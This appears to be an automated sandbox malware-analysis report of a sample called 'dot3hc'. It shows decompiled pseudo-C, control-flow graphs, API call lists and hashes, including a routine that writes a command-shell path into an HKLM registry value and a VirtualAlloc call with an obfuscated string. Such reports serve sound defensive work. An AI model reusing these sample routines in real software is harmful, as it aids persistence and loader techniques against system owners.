                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Menu$AddressAppendMessageProcSend$AllocSystemVirtual
                                                      • String ID: 6Z6x8!4zpUCX@R#toJr^+TCgAUZ(Q%ylNN>>FTZD_XQd$eGdqe@v?1J48XWg!*)(O9tF@RENQV27J_nbjWhEt%U5@&RL(^C?NZe>&SRx1xAVYzU6ZpO^Q$UUACZDADWAJJJJJ$VirtualAlloc$kernel32.dll
                                                      • API String ID: 788825803-1877897661
                                                      • Opcode ID: 0c317e2cec8b35522e85a97d8f9b33161106303d3713bb799065d46ae679c45d
                                                      • Instruction ID: ff84c4e7adf23d41df9a6f65582e714f74d1400c784c60132990823294043f06
                                                      • Opcode Fuzzy Hash: 0c317e2cec8b35522e85a97d8f9b33161106303d3713bb799065d46ae679c45d
                                                      • Instruction Fuzzy Hash: 3B711AB4E40208EBDB14DBA5C955BAEB7B5BF48704F20422EF5017B2D1D7796901CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 183 41ab2a-41ab75 call 40db94 GetModuleFileNameA 186 41ab77-41ab79 183->186 187 41ab7b call 40e0f0 183->187 186->187 188 41ab80-41ab92 PathFindExtensionA 186->188 187->188 190 41ab94 call 40e0f0 188->190 191 41ab99-41abb5 call 41aaec 188->191 190->191 195 41abb7 call 40e0f0 191->195 196 41abbc-41abc0 191->196 195->196 198 41abc2-41abd4 call 41fd45 196->198 199 41abdb-41abe0 196->199 198->199 207 41abd6 198->207 200 41abe2-41abf7 call 40dda7 199->200 201 41ac0f-41ac16 199->201 213 41abf9-41abfd 200->213 214 41abff 200->214 204 41ac59-41ac5d 201->204 205 41ac18-41ac25 201->205 209 41ac91-41aca8 call 41e5df 204->209 210 41ac5f-41ac8b call 421a5d call 402f17 call 41fd45 204->210 211 41ac27-41ac2c 205->211 212 41ac2e 205->212 207->199 210->207 210->209 217 41ac33-41ac51 call 403ebb call 41fd45 211->217 212->217 219 41ac02-41ac0d call 41fd45 213->219 214->219 217->207 230 41ac53-41ac56 217->230 219->201 219->207 230->204
                                                      C-Code - Quality: 62%
                                                      			E0041AB2A(void* __ecx, void* __edx, void* __eflags, char _a132, char _a392, signed int _a652, char _a656) {
                                                      				char _v124;
                                                      				char* _v128;
                                                      				char _v660;
                                                      				char _v804;
                                                      				char _v812;
                                                      				char _v820;
                                                      				intOrPtr _v832;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t44;
                                                      				char* _t53;
                                                      				char* _t57;
                                                      				void* _t59;
                                                      				intOrPtr _t73;
                                                      				void* _t76;
                                                      				char* _t79;
                                                      				char* _t81;
                                                      				char* _t84;
                                                      				void* _t87;
                                                      				void* _t89;
                                                      				void* _t90;
                                                      				intOrPtr _t93;
                                                      				void* _t94;
                                                      				void* _t95;
                                                      				void* _t96;
                                                      				void* _t97;
                                                      				void* _t99;
                                                      				void* _t100;
                                                      				signed int _t102;
                                                      				void* _t105;
                                                      				void* _t106;
                                                      				void* _t108;
                                                      				void* _t109;
                                                      
                                                      				_t94 = __edx;
                                                      				_t90 = __ecx;
                                                      				_t102 =  &_v660;
                                                      				_t109 = _t108 - 0x310;
                                                      				_t44 =  *0x443590; // 0x8ffedb05
                                                      				_a652 = _t44 ^ _t102;
                                                      				_push(_t87);
                                                      				_push(_t95);
                                                      				_t99 = __ecx;
                                                      				_t96 = E0040DB94(_t87, _t95, __ecx, __eflags);
                                                      				 *(_t96 + 8) =  *(_t99 + 0x44);
                                                      				 *(_t96 + 0xc) =  *(_t99 + 0x44);
                                                      				if(GetModuleFileNameA( *(_t99 + 0x44),  &_a392, 0x104) == 0) {
                                                      					L7:
                                                      					E0040E0F0(_t90);
                                                      				} else {
                                                      					__eflags = __eax - 0x104;
                                                      					if(__eax == 0x104) {
                                                      						goto L7;
                                                      					}
                                                      				}
                                                      				_t53 = PathFindExtensionA( &_a392); // executed
                                                      				__eflags = _t53;
                                                      				_v128 = _t53;
                                                      				if(_t53 == 0) {
                                                      					E0040E0F0(_t90);
                                                      				}
                                                      				 *_v128 = 0;
                                                      				_t57 = E0041AAEC( &_a392,  &_a132, 0x104);
                                                      				__eflags = _t57;
                                                      				if(_t57 != 0) {
                                                      					E0040E0F0(_t90);
                                                      				}
                                                      				__eflags =  *(_t99 + 0x60);
                                                      				if( *(_t99 + 0x60) != 0) {
                                                      					L15:
                                                      					_t58 =  *(_t99 + 0x50);
                                                      					__eflags = _t58;
                                                      					if(_t58 != 0) {
                                                      						L20:
                                                      						 *(_t96 + 0x10) = _t58;
                                                      						__eflags =  *(_t99 + 0x64);
                                                      						if( *(_t99 + 0x64) != 0) {
                                                      							L26:
                                                      							__eflags =  *(_t99 + 0x68);
                                                      							if( *(_t99 + 0x68) != 0) {
                                                      								L28:
                                                      								_pop(_t97);
                                                      								_pop(_t100);
                                                      								_pop(_t89);
                                                      								_t59 = E0041E5DF(_t58, _t89, _a652 ^ _t102, _t94, _t97, _t100);
                                                      								__eflags =  &_a656;
                                                      								return _t59;
                                                      							} else {
                                                      								_push(E00421A5D(_t94,  &_a132, 0x104, ".INI"));
                                                      								E00402F17(0x104, _t90, _t96, _t99);
                                                      								_t58 = E0041FD45( &_a132);
                                                      								_t109 = _t109 + 0x14;
                                                      								__eflags = _t58;
                                                      								 *(_t99 + 0x68) = _t58;
                                                      								if(_t58 == 0) {
                                                      									goto L14;
                                                      								} else {
                                                      									goto L28;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							_t76 =  &_a652 - _v128;
                                                      							__eflags =  *((intOrPtr*)(_t99 + 0x6c)) - 1;
                                                      							if( *((intOrPtr*)(_t99 + 0x6c)) != 1) {
                                                      								_push(".HLP");
                                                      							} else {
                                                      								_push(".CHM");
                                                      							}
                                                      							_push(_t76);
                                                      							_push(_v128);
                                                      							E00403EBB(0x104, _t94, _t96, _t99, _t102);
                                                      							_t109 = _t109 + 0xc;
                                                      							_t79 = E0041FD45( &_a392);
                                                      							__eflags = _t79;
                                                      							_pop(_t90);
                                                      							 *(_t99 + 0x64) = _t79;
                                                      							if(_t79 == 0) {
                                                      								goto L14;
                                                      							} else {
                                                      								_t58 = _v128;
                                                      								 *_v128 = 0;
                                                      								goto L26;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						_t81 = E0040DDA7(0x104, _t90, _t96, _t99, _t102, 0xe000,  &_v124, 0x100);
                                                      						__eflags = _t81;
                                                      						if(_t81 == 0) {
                                                      							_push( *(_t99 + 0x60));
                                                      						} else {
                                                      							_push( &_v124);
                                                      						}
                                                      						_t58 = E0041FD45();
                                                      						__eflags = _t58;
                                                      						 *(_t99 + 0x50) = _t58;
                                                      						_pop(_t90);
                                                      						if(_t58 == 0) {
                                                      							goto L14;
                                                      						} else {
                                                      							goto L20;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					_t84 = E0041FD45( &_a132);
                                                      					__eflags = _t84;
                                                      					_pop(_t90);
                                                      					 *(_t99 + 0x60) = _t84;
                                                      					if(_t84 != 0) {
                                                      						goto L15;
                                                      					} else {
                                                      						L14:
                                                      						_push(_t102);
                                                      						_t105 = _t109;
                                                      						_push(_t90);
                                                      						_v804 = 0x442350;
                                                      						E0041F7F4( &_v804, 0x43c4ec);
                                                      						asm("int3");
                                                      						_push(_t105);
                                                      						_t106 = _t109;
                                                      						_push(_t90);
                                                      						_t11 =  &_v812; // 0x442350
                                                      						_v812 = 0x4423e8;
                                                      						E0041F7F4(_t11, 0x43c54c);
                                                      						asm("int3");
                                                      						_push(_t106);
                                                      						_push(_t90);
                                                      						_t13 =  &_v820; // 0x4423e8
                                                      						_v820 = 0x442480;
                                                      						E0041F7F4(_t13, 0x43c590);
                                                      						asm("int3");
                                                      						_push(4);
                                                      						E0041F6EA(E00431BFC, 0x104, _t96, _t99);
                                                      						_t93 = E0040F014(0x104);
                                                      						_v832 = _t93;
                                                      						_t73 = 0;
                                                      						_v820 = 0;
                                                      						if(_t93 != 0) {
                                                      							_t73 = E0040D519(_t93);
                                                      						}
                                                      						return E0041F7C2(_t73);
                                                      					}
                                                      				}
                                                      			}


                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: __strdup$ExtensionFileFindModuleNamePath_strcat_s
                                                      • String ID: .CHM$.HLP$.INI
                                                      • API String ID: 1153805871-4017452060
                                                      • Opcode ID: c49fd2a1216ea896ee94d8016267d423bc5801ae71d4a536f5c85aa2f1552b22
                                                      • Instruction ID: 57232d50dc1b964aec71869080f5721069c83be35b5a1d3d80364e0175c1dcf5
                                                      • Opcode Fuzzy Hash: c49fd2a1216ea896ee94d8016267d423bc5801ae71d4a536f5c85aa2f1552b22
                                                      • Instruction Fuzzy Hash: 51416D715012499FDB30EFA9CD85BDB77ECBF04308F00482BE945D6641EB78E9948B69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      control_flow_graph 232 402750-402795 RegCreateKeyExA 233 402833-402839 232->233 234 40279b-4027b2 GetVersion 232->234 235 4027b4-4027c5 call 41eb60 234->235 236 4027c7-4027d5 call 41eb60 234->236 241 4027d8-4027fe RegQueryValueExA 235->241 236->241 242 402800-402826 lstrlenA RegSetValueExA 241->242 243 402829-40282d RegCloseKey 241->243 242->243 243->233
                                                      C-Code - Quality: 100%
                                                      			E00402750(intOrPtr __ecx, CHAR* _a4) {
                                                      				void* _v8;
                                                      				int _v12;
                                                      				long _v16;
                                                      				long _v20;
                                                      				int _v24;
                                                      				int _v28;
                                                      				intOrPtr _v32;
                                                      				long _t32;
                                                      				int _t34;
                                                      				char* _t36;
                                                      				char* _t46;
                                                      				char* _t48;
                                                      
                                                      				_v32 = __ecx;
                                                      				_v8 = 0;
                                                      				_v16 = 0;
                                                      				_t46 =  *0x442000; // 0x4346d4
                                                      				_v16 = RegCreateKeyExA(0x80000002, _t46, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12);
                                                      				if(_v16 == 0) {
                                                      					_v28 = 0x104;
                                                      					_v20 = GetVersion();
                                                      					if(_v20 >= 0x80000000) {
                                                      						E0041EB60(_a4, "command.com");
                                                      					} else {
                                                      						E0041EB60(_a4, "cmd.exe");
                                                      					}
                                                      					_t48 =  *0x442008; // 0x434684
                                                      					_t32 = RegQueryValueExA(_v8, _t48, 0,  &_v24, _a4,  &_v28); // executed
                                                      					_v16 = _t32;
                                                      					if(_v16 != 0) {
                                                      						_t34 = lstrlenA(_a4);
                                                      						_t36 =  *0x442008; // 0x434684
                                                      						_v16 = RegSetValueExA(_v8, _t36, 0, 1, _a4, _t34 + 1);
                                                      					}
                                                      					RegCloseKey(_v8);
                                                      				}
                                                      				return _v16;
                                                      			}


                                                      APIs
                                                      • RegCreateKeyExA.ADVAPI32(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 00402788
                                                      • GetVersion.KERNEL32 ref: 004027A2
                                                      • _strcat.LIBCMT ref: 004027BD
                                                      • _strcat.LIBCMT ref: 004027D0
                                                      • RegQueryValueExA.KERNELBASE(00000000,00434684,00000000,?,?,00000104), ref: 004027F1
                                                      • lstrlenA.KERNEL32(?), ref: 00402804
                                                      • RegSetValueExA.ADVAPI32(00000000,00434684,00000000,00000001,?,-00000001), ref: 00402820
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040282D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Value_strcat$CloseCreateQueryVersionlstrlen
                                                      • String ID: cmd.exe$command.com
                                                      • API String ID: 2337509535-906605525
                                                      • Opcode ID: 23a86dbd8a56b400e1eae7f4a72586dde06780c802320ec2f8d035002184cb91
                                                      • Instruction ID: 5414f4e155f680cb360236f53e8781cc7486691db9c8143961ece0993b29ec0d
                                                      • Opcode Fuzzy Hash: 23a86dbd8a56b400e1eae7f4a72586dde06780c802320ec2f8d035002184cb91
                                                      • Instruction Fuzzy Hash: CB21EAB9D00208EFDB14DFD5DD49BEEB7B8AB48701F108569F605A7280D7B86644CFA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      control_flow_graph 244 40638f-4063b9 call 41f71d call 40db94 249 4063da-4063dd 244->249 250 4063bb-4063d7 call 40db94 FindResourceA LoadResource 244->250 252 4063eb-4063ee 249->252 253 4063df-4063e8 LockResource 249->253 250->249 255 4063f0-4063f3 252->255 256 4063f8-406413 call 405ec7 call 409d3f 252->256 253->252 257 40654c-406551 call 41f7c2 255->257 264 406415-40641e GetDesktopWindow 256->264 265 406476-40648f call 40b748 call 409c97 call 40619f 256->265 264->265 267 406420-40642b IsWindowEnabled 264->267 276 406494-406498 265->276 267->265 269 40642d-40644b EnableWindow call 403ed6 267->269 269->265 274 40644d-406459 269->274 274->265 282 40645b-406464 call 40ca70 274->282 277 4064d3-4064f9 276->277 278 40649a-40649e 276->278 287 406504-406507 277->287 288 4064fb-4064ff call 40ca8b 277->288 280 4064a0-4064ae call 40c981 278->280 281 4064bd-4064c0 278->281 297 4064b0-4064b2 280->297 298 4064b3-4064bb call 40982d 280->298 281->277 286 4064c2-4064ce call 40cc5e 281->286 282->265 299 406466-40646f call 40ca8b 282->299 286->277 289 406514-406517 287->289 290 406509-40650e EnableWindow 287->290 288->287 295 406519-406522 GetActiveWindow 289->295 296 40652d-40653e call 405f01 289->296 290->289 295->296 300 406524-406527 SetActiveWindow 295->300 308 406540-406543 FreeResource 296->308 309 406549 296->309 297->298 298->281 299->265 300->296 308->309 309->257
                                                      C-Code - Quality: 94%
                                                      			E0040638F(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				signed int _t54;
                                                      				void* _t58;
                                                      				signed int _t59;
                                                      				signed int _t63;
                                                      				signed short _t71;
                                                      				signed int _t84;
                                                      				void* _t94;
                                                      				struct HINSTANCE__* _t96;
                                                      				signed int _t97;
                                                      				void* _t98;
                                                      				signed int _t100;
                                                      				void* _t101;
                                                      				void* _t102;
                                                      
                                                      				_t102 = __eflags;
                                                      				_t94 = __edx;
                                                      				_push(0x24);
                                                      				E0041F71D(E00431E39, __ebx, __edi, __esi);
                                                      				_t100 = __ecx;
                                                      				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
                                                      				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
                                                      				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
                                                      				_t54 = E0040DB94(__ebx, __edi, __ecx, _t102);
                                                      				_t96 =  *(_t54 + 0xc);
                                                      				_t84 = 0;
                                                      				_t103 =  *(_t100 + 0x58);
                                                      				if( *(_t100 + 0x58) != 0) {
                                                      					_t96 =  *(E0040DB94(0, _t96, _t100, _t103) + 0xc);
                                                      					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
                                                      					 *(_t101 - 0x18) = _t54;
                                                      				}
                                                      				if( *(_t101 - 0x18) != _t84) {
                                                      					_t54 = LockResource( *(_t101 - 0x18));
                                                      					 *(_t101 - 0x1c) = _t54;
                                                      				}
                                                      				if( *(_t101 - 0x1c) != _t84) {
                                                      					_t86 = _t100;
                                                      					 *(_t101 - 0x14) = E00405EC7(_t84, _t100, __eflags);
                                                      					E00409D3F(_t84, _t96, __eflags);
                                                      					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
                                                      					__eflags =  *(_t101 - 0x14) - _t84;
                                                      					 *(_t101 - 0x2c) = _t84;
                                                      					 *(_t101 - 0x24) = _t84;
                                                      					if(__eflags != 0) {
                                                      						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
                                                      						if(__eflags != 0) {
                                                      							__eflags = IsWindowEnabled( *(_t101 - 0x14));
                                                      							if(__eflags != 0) {
                                                      								EnableWindow( *(_t101 - 0x14), 0);
                                                      								 *(_t101 - 0x2c) = 1;
                                                      								_t84 = E00403ED6();
                                                      								__eflags = _t84;
                                                      								 *(_t101 - 0x24) = _t84;
                                                      								if(__eflags != 0) {
                                                      									_t86 = _t84;
                                                      									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
                                                      									if(__eflags != 0) {
                                                      										_t86 = _t84;
                                                      										__eflags = E0040CA70(_t84);
                                                      										if(__eflags != 0) {
                                                      											_t86 = _t84;
                                                      											E0040CA8B(_t84, 0);
                                                      											 *(_t101 - 0x28) = 1;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
                                                      					E0040B748(_t96, __eflags, _t100);
                                                      					_t58 = E00409C97(_t84, _t86, _t101,  *(_t101 - 0x14));
                                                      					_push(_t96);
                                                      					_push(_t58);
                                                      					_push( *(_t101 - 0x1c));
                                                      					_t59 = E0040619F(_t84, _t100, _t94, _t96, _t100, __eflags); // executed
                                                      					_t97 = 0;
                                                      					__eflags = _t59;
                                                      					if(_t59 != 0) {
                                                      						__eflags =  *(_t100 + 0x3c) & 0x00000010;
                                                      						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
                                                      							_t98 = 4;
                                                      							_t71 = E0040C981(_t100);
                                                      							__eflags = _t71 & 0x00000100;
                                                      							if((_t71 & 0x00000100) != 0) {
                                                      								_t98 = 5;
                                                      							}
                                                      							E0040982D(_t100, _t98);
                                                      							_t97 = 0;
                                                      							__eflags = 0;
                                                      						}
                                                      						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
                                                      						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
                                                      							E0040CC5E(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
                                                      						}
                                                      					}
                                                      					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
                                                      					__eflags =  *(_t101 - 0x28) - _t97;
                                                      					if( *(_t101 - 0x28) != _t97) {
                                                      						E0040CA8B(_t84, 1);
                                                      					}
                                                      					__eflags =  *(_t101 - 0x2c) - _t97;
                                                      					if( *(_t101 - 0x2c) != _t97) {
                                                      						EnableWindow( *(_t101 - 0x14), 1);
                                                      					}
                                                      					__eflags =  *(_t101 - 0x14) - _t97;
                                                      					if(__eflags != 0) {
                                                      						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
                                                      						if(__eflags == 0) {
                                                      							SetActiveWindow( *(_t101 - 0x14));
                                                      						}
                                                      					}
                                                      					 *((intOrPtr*)( *_t100 + 0x60))();
                                                      					E00405F01(_t84, _t100, _t97, _t100, __eflags);
                                                      					__eflags =  *(_t100 + 0x58) - _t97;
                                                      					if( *(_t100 + 0x58) != _t97) {
                                                      						FreeResource( *(_t101 - 0x18));
                                                      					}
                                                      					_t63 =  *(_t100 + 0x44);
                                                      					goto L31;
                                                      				} else {
                                                      					_t63 = _t54 | 0xffffffff;
                                                      					L31:
                                                      					return E0041F7C2(_t63);
                                                      				}
                                                      			}

















                                                      APIs
                                                      • __EH_prolog3_catch.LIBCMT ref: 00406396
                                                      • FindResourceA.KERNEL32(?,?,00000005), ref: 004063C9
                                                      • LoadResource.KERNEL32(?,00000000), ref: 004063D1
                                                      • LockResource.KERNEL32(?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 004063E2
                                                      • GetDesktopWindow.USER32 ref: 00406415
                                                      • IsWindowEnabled.USER32(?), ref: 00406423
                                                      • EnableWindow.USER32(?,00000000), ref: 00406432
                                                        • Part of subcall function 0040CA70: IsWindowEnabled.USER32(?), ref: 0040CA79
                                                        • Part of subcall function 0040CA8B: EnableWindow.USER32(?,?), ref: 0040CA98
                                                      • EnableWindow.USER32(?,00000001), ref: 0040650E
                                                      • GetActiveWindow.USER32 ref: 00406519
                                                      • SetActiveWindow.USER32(?,?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 00406527
                                                      • FreeResource.KERNEL32(?,?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 00406543
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                      • String ID:
                                                      • API String ID: 1509511306-0
                                                      • Opcode ID: bf87a749a78ca6df1642d3bac92c0d685b06468b383742aa02b2d1cc5a8d1e5f
                                                      • Instruction ID: 8608bcd7ad7a3e8128c5f383c3e7d97f5d4ffa180cd5963f6d8b64b71c53f861
                                                      • Opcode Fuzzy Hash: bf87a749a78ca6df1642d3bac92c0d685b06468b383742aa02b2d1cc5a8d1e5f
                                                      • Instruction Fuzzy Hash: 1051AD30A00605DBCB21AFA5C985AAFBBB1BF84705F15413EE502B62D2CB785951CF6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 310 40f1af-40f1cc EnterCriticalSection 311 40f1db-40f1e0 310->311 312 40f1ce-40f1d5 310->312 314 40f1e2-40f1e5 311->314 315 40f1fd-40f205 311->315 312->311 313 40f293-40f296 312->313 317 40f298-40f29b 313->317 318 40f29e-40f2be LeaveCriticalSection 313->318 316 40f1e8-40f1eb 314->316 319 40f207-40f21a call 40ead1 GlobalAlloc 315->319 320 40f21c-40f23d GlobalHandle GlobalUnlock call 40ead1 GlobalReAlloc 315->320 321 40f1f5-40f1f7 316->321 322 40f1ed-40f1f3 316->322 317->318 327 40f243-40f245 319->327 320->327 321->313 321->315 322->316 322->321 328 40f247-40f24c 327->328 329 40f26b-40f290 GlobalLock call 41f330 327->329 331 40f25c-40f260 LeaveCriticalSection 328->331 332 40f24e-40f256 GlobalHandle GlobalLock 328->332 329->313 331->329 332->331
                                                      C-Code - Quality: 80%
                                                      			E0040F1AF() {
                                                      				struct _CRITICAL_SECTION* _v4;
                                                      				char _v28;
                                                      				char _v36;
                                                      				char _v44;
                                                      				intOrPtr _v56;
                                                      				void* __ebx;
                                                      				intOrPtr __ecx;
                                                      				signed int __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				struct _CRITICAL_SECTION* _t39;
                                                      				intOrPtr _t40;
                                                      				void* _t41;
                                                      				long _t44;
                                                      				void* _t45;
                                                      				signed int* _t51;
                                                      				intOrPtr _t64;
                                                      				long _t68;
                                                      				void* _t69;
                                                      				void* _t70;
                                                      				signed int _t72;
                                                      				intOrPtr _t78;
                                                      				signed int _t82;
                                                      				void* _t86;
                                                      				signed int _t88;
                                                      				void* _t90;
                                                      				void* _t91;
                                                      				void* _t93;
                                                      
                                                      				_push(_t72);
                                                      				_push(_t69);
                                                      				_push(_t88);
                                                      				_t86 = _t72;
                                                      				_t1 = _t86 + 0x1c; // 0x4465f0
                                                      				_t39 = _t1;
                                                      				_v4 = _t39;
                                                      				EnterCriticalSection(_t39);
                                                      				_t3 = _t86 + 4; // 0x20
                                                      				_t40 =  *_t3;
                                                      				_t4 = _t86 + 8; // 0x3
                                                      				_t82 =  *_t4;
                                                      				if(_t82 >= _t40) {
                                                      					L7:
                                                      					_t82 = 1;
                                                      					__eflags = _t40 - 1;
                                                      					if(_t40 <= 1) {
                                                      						L12:
                                                      						_t21 = _t40 + 0x20; // 0x40
                                                      						_t88 = _t21;
                                                      						_t22 = _t86 + 0x10; // 0x5701c0
                                                      						_t41 =  *_t22;
                                                      						__eflags = _t41;
                                                      						if(__eflags != 0) {
                                                      							_t69 = GlobalHandle(_t41);
                                                      							GlobalUnlock(_t69);
                                                      							_t44 = E0040EAD1(_t72, __eflags, _t88, 8);
                                                      							_t72 = 0x2002;
                                                      							_t45 = GlobalReAlloc(_t69, _t44, ??);
                                                      						} else {
                                                      							_t68 = E0040EAD1(_t72, __eflags, _t88, 8);
                                                      							_pop(_t72);
                                                      							_t45 = GlobalAlloc(2, _t68); // executed
                                                      						}
                                                      						__eflags = _t45;
                                                      						if(_t45 != 0) {
                                                      							_t70 = GlobalLock(_t45);
                                                      							_t25 = _t86 + 4; // 0x20
                                                      							__eflags = _t88 -  *_t25 << 3;
                                                      							E0041F330(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
                                                      							 *(_t86 + 4) = _t88;
                                                      							 *(_t86 + 0x10) = _t70;
                                                      							goto L20;
                                                      						} else {
                                                      							_t23 = _t86 + 0x10; // 0x5701c0
                                                      							_t86 =  *_t23;
                                                      							__eflags = _t86;
                                                      							if(_t86 != 0) {
                                                      								GlobalLock(GlobalHandle(_t86));
                                                      							}
                                                      							LeaveCriticalSection(_v4);
                                                      							_push(_t88);
                                                      							_t90 = _t93;
                                                      							_push(_t72);
                                                      							_v28 = 0x442350;
                                                      							E0041F7F4( &_v28, 0x43c4ec);
                                                      							asm("int3");
                                                      							_push(_t90);
                                                      							_t91 = _t93;
                                                      							_push(_t72);
                                                      							_t7 =  &_v36; // 0x442350
                                                      							_v36 = 0x4423e8;
                                                      							E0041F7F4(_t7, 0x43c54c);
                                                      							asm("int3");
                                                      							_push(_t91);
                                                      							_push(_t72);
                                                      							_t9 =  &_v44; // 0x4423e8
                                                      							_v44 = 0x442480;
                                                      							E0041F7F4(_t9, 0x43c590);
                                                      							asm("int3");
                                                      							_push(4);
                                                      							E0041F6EA(E00431BFC, _t69, _t82, _t86);
                                                      							_t78 = E0040F014(0x104);
                                                      							_v56 = _t78;
                                                      							_t64 = 0;
                                                      							_v44 = 0;
                                                      							if(_t78 != 0) {
                                                      								_t64 = E0040D519(_t78);
                                                      							}
                                                      							return E0041F7C2(_t64);
                                                      						}
                                                      					} else {
                                                      						_t18 = _t86 + 0x10; // 0x5701c0
                                                      						_t72 =  *_t18 + 8;
                                                      						__eflags = _t72;
                                                      						while(1) {
                                                      							__eflags =  *_t72 & 0x00000001;
                                                      							if(( *_t72 & 0x00000001) == 0) {
                                                      								break;
                                                      							}
                                                      							_t82 = _t82 + 1;
                                                      							_t72 = _t72 + 8;
                                                      							__eflags = _t82 - _t40;
                                                      							if(_t82 < _t40) {
                                                      								continue;
                                                      							}
                                                      							break;
                                                      						}
                                                      						__eflags = _t82 - _t40;
                                                      						if(_t82 < _t40) {
                                                      							goto L20;
                                                      						} else {
                                                      							goto L12;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					_t13 = __esi + 0x10; // 0x5701c0
                                                      					__ecx =  *_t13;
                                                      					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
                                                      					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
                                                      						L20:
                                                      						_t30 = _t86 + 0xc; // 0x3
                                                      						__eflags = _t82 -  *_t30;
                                                      						if(_t82 >=  *_t30) {
                                                      							_t31 = _t82 + 1; // 0x4
                                                      							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
                                                      						}
                                                      						_t33 = _t86 + 0x10; // 0x5701c0
                                                      						_t51 =  *_t33 + _t82 * 8;
                                                      						 *_t51 =  *_t51 | 0x00000001;
                                                      						__eflags =  *_t51;
                                                      						_t37 = _t82 + 1; // 0x4
                                                      						 *(_t86 + 8) = _t37;
                                                      						LeaveCriticalSection(_v4);
                                                      						return _t82;
                                                      					} else {
                                                      						goto L7;
                                                      					}
                                                      				}
                                                      			}































                                                      0x00000000
                                                      0x00000000
                                                      0x0040f1d5

                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(004465F0,?,?,?,?,004465D4,0040F5D8,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004), ref: 0040F1BE
                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,004465D4,0040F5D8,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040F214
                                                      • GlobalHandle.KERNEL32(005701C0), ref: 0040F21D
